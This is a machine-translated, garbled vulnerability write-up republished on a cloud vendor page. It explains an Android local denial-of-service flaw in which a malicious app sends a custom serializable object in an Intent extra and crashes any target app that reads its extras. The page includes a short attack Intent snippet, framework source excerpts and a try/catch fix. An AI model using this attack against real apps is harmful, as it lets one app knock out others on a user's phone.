Android denial of service vulnerability analysis and vulnerability detection

Source: Internet
Author: User
Tags try catch

  " Super Denial of service vulnerability " is an android generic denial of service vulnerability that could allow a malicious attacker to use this vulnerability to cause any app in the phone to crash and not work, almost affecting all Android devices currently on the market APP application.

Vulnerability Analysis:

  0xr0ot and the Xbalien A common local denial of service vulnerability was found when communicating all of the exception types that could lead to application denial of service. This general-purpose local denial of service can result in a large area of app denial of service.

The denial of service for serialized objects is mainly due to the use of Getserializableextra () APIin the application, because the application developer does not judge the incoming data, Malicious apps can pass in malformed data, resulting in the application of local denial of service.

Vulnerability Application code snippet:

  Intent i = getintent ();

  if (I.getaction (). Equals ("Serializable_action")) {

  I.getserializableextra ("Serializable_key");// no abnormal judgment.

  }

Attack application code Snippet:

  Intent i = new Intent ();

  I.setaction ("Serializable_action");

  I.setclassname ("Com.exp.serializable", "com.exp.serializable.MainActivity");

  I.putextra ("Seriadddddlizable_dkey", XXX); here is the incoming malformed data

  StartActivity (i);

java.lang.classcastexception

But later the communication found that when passing in a custom serialized object Serializable or getparcelable object, receive Intent The target component in Getserializableextra (),getparcelable () , etc. throws a class-undefined exception Java.lang.NoClassDefFoundError. This is because when you apply a serialized class object to a vulnerability that is not in the application itself, it must not be found in the application context.

The custom serialization class is simple:

  public class Dataschema implements Serializable {

  Private static final long serialversionuid = -3601187837704976264l;

  Public Dataschema () {

  Super ();

  }

  }

The corresponding attack code in the XXX Place in the New Dataschema (), we found that the incoming key whether or not the same as the vulnerability application, Throws a class-undefined exception.

As the test progresses, we discover through Logcat that it is not necessarily Getserializableextra (),getparcelable () in the error log caused by. Then we stretched out and tried to pass in our custom serialized class object to Getxxxextra () and found that the class was thrown out of the undefined exception.

To test the app code snippet:

  protected void OnCreate (Bundle savedinstancestate) {

  Intent Intent = Getintent ();

  Intent.getstringextra ("ROIS");// This will still be due to Noclassdeffounderror Crash

  }

We then tested a number of mainstream applications on the market, including BAT . Found that this method can kill. We started to think that this was the problem with Android itself and began to turn over the source code.

  /frameworks/base/core/java/android/content/intent.java

  public string Getstringextra (string name) {

  return Mextras = = null? Null:mExtras.getString (name);

  }

  /frameworks/base/core/java/android/os/bundle.java

  public string getString (string key) {

  unparcel ();// working with Data

  ...

  }

  /* Package */synchronized void Unparcel () {

  ...

  Mparcelleddata.readmapinternal (MMap, N, Mclassloader);

  ...

  }

  /frameworks/base/core/java/android/os/parcel.java

  readmapinternal parse the data passed in

  /* Package */void Readmapinternal (Map outval, int N,

  ClassLoader loader) {

  while (N > 0) {

  Object key = ReadValue (loader);

  Object value = readvalue (loader);

  Outval.put (key, value);

  n--;

  }

  }

Finally, when parsing to a Serializable object, throws an exception because the class is not loaded

  Public final Serializable readserializable () {

  ...

  try {

  ObjectInputStream ois = new ObjectInputStream (Bais);

  Return (Serializable) ois.readobject ();

  } catch (IOException IoE) {

  throw new RuntimeException ("Parcelable encountered" +

  "IOException reading a Serializable object (name =" + name +

  ")", IoE);

  } catch (ClassNotFoundException Cnfe) {

  throw new RuntimeException ("Parcelable encountered" +

  "ClassNotFoundException reading a Serializable object (name ="

  + name + ")", CNFE);

  }

  }

But looking back, Google certainly doesn't think it's an Android Bug, and developers just need to add a try catch to catch the exception.

Vulnerability Detection:

AI has developed an automated testing tool for developers vulnerability detection is possible . Detection Tool:http://www.ineice.com/

Bug fixes:

Whatever is get extra, as long as it is Getxxxextra (), plus try catch Catch the exception.


Android denial of service vulnerability analysis and vulnerability detection

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.